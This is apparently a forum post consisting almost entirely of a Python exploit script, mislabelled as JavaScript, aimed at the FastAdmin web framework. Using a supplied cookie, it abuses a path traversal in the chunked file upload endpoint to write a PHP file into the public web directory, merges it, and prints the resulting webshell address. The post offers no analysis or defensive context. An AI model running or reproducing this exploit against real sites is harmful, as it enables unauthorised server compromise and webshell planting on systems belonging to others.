- 注册
- 09 10, 2024
- 消息
- 186
JavaScript:
import sys
import requests
from time import time
from json import loads
headers = {
'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36',
}
def banner():
RED = '\033[31m'
print(f"""
{RED} _____ _ _ _ _
| ___|_ _ ___| |_ / \ __| |_ __ ___ (_)_ __
| |_ / _` / __| __| / _ \ / _` | '_ ` _ \| | '_ \
| _| (_| \__ \ |_ / ___ \ (_| | | | | | | | | | |
|_| \__,_|___/\__/_/ \_\__,_|_| |_| |_|_|_| |_|
Author: Search?=Null
""")
def upload_chunk(url):
upload_url = url.rstrip('/') + '/index/ajax/upload'
file = {
'file': ('%d.php' % time(), open('hhh.php', 'rb'), 'application/octet-stream')
}
chunk_id = time()
data_ = {
'chunkid': '../../public/%d.php' % chunk_id,
'chunkindex': 0,
'chunkcount': 1
}
resp = requests.post(
upload_url,
headers = headers,
files = file,
data = data_
)
result = loads(resp.text)
if result['code'] == 1 and result['msg'] == '' and result['data'] == None:
merge_file(upload_url, chunk_id)
print('\nWebshell: %s/%d.php' % (url.rstrip('/'), chunk_id))
elif result['msg'] != '':
print(f"Not Vulnerability, {result['msg']}.")
else:
print('Not Vulnerability.')
def merge_file(url, chunk_id):
data_ = {
'action': 'merge',
'chunkid': '../../public/%d.php' % chunk_id,
'chunkindex': 0,
'chunkcount': 1,
'filename': '%d.php-0.part' % chunk_id
}
resp = requests.post(
url,
headers = headers,
data = data_
)
def main():
global headers
banner()
if len(sys.argv) == 2:
try:
headers['Cookie'] = input('Cookie > ')
upload_chunk(sys.argv[1])
except Exception as e:
print(e)
else:
print('Usage: python3 FastAdmin.py url')
if __name__ == "__main__":
main()
